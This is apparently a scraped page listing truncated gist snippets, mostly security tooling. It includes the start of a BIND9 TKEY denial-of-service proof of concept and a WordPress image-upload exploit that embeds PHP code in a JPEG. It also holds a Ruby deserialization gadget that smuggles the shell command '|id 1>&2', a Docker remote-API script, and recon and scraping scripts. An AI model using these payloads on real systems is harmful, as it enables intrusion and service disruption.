This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
import sys | |
print('CVE-2015-5477 BIND9 TKEY PoC') | |
if len(sys.argv) < 2: | |
print('Usage: ' + sys.argv[0] + ' [target]') | |
sys.exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
import re | |
def queueRequests(target, wordlists): | |
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
engine = RequestEngine(endpoint=target.endpoint, | |
concurrentConnections=5, | |
requestsPerConnection=1, | |
resumeSSL=False, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
while true | |
do | |
printf 'GET /?cb=xxx HTTP/1.1\r\n'\ | |
'Host: blanco-dev.eu2.frbit.net\r\n'\ | |
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\ | |
'Accept: */*\r\n'\ | |
'Accept-Language: en-US,en;q=0.5\r\n'\ | |
'Accept-Encoding: gzip, deflate\r\n'\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# script for subdomain enumeration using 4 of the best tools with some APIs: | |
# * findomain: https://github.com/Edu4rdSHL/findomain | |
# * SubFinder: https://github.com/projectdiscovery/subfinder | |
# * Amass: https://github.com/OWASP/Amass | |
# * AssetFinder: https://github.com/tomnomnom/assetfinder | |
# | |
bold="\e[1m" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script> | |
<script type="text/javascript"> | |
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9 | |
$(function(){ | |
parse_messages = function() | |
{ | |
$('.twoLines.preview>.snippet').each(function(index,value) | |
{ | |
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,''); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
class Gem::StubSpecification | |
def initialize; end | |
end | |
stub_specification = Gem::StubSpecification.new | |
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
import requests | |
import logging | |
import pandas as pd | |
import time | |
logging.basicConfig() | |
logger = logging.getLogger('tesla-crawler') | |
logger.setLevel(logging.INFO) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from __future__ import print_function | |
import requests | |
import logging | |
import json | |
import urllib.parse | |
# NOTE | |
# Enable Remote API with the following command | |
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock | |
# This is an intended feature, remember to filter the port 2375.. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# colors | |
RED='\033[0;31m' | |
GREEN='\033[0;32m' | |
YELLOW='\033[0;33m' | |
RESET='\033[0m' | |
# install homebrew | |
echo -e "[-] ${GREEN}install homebrew...${RESET}" |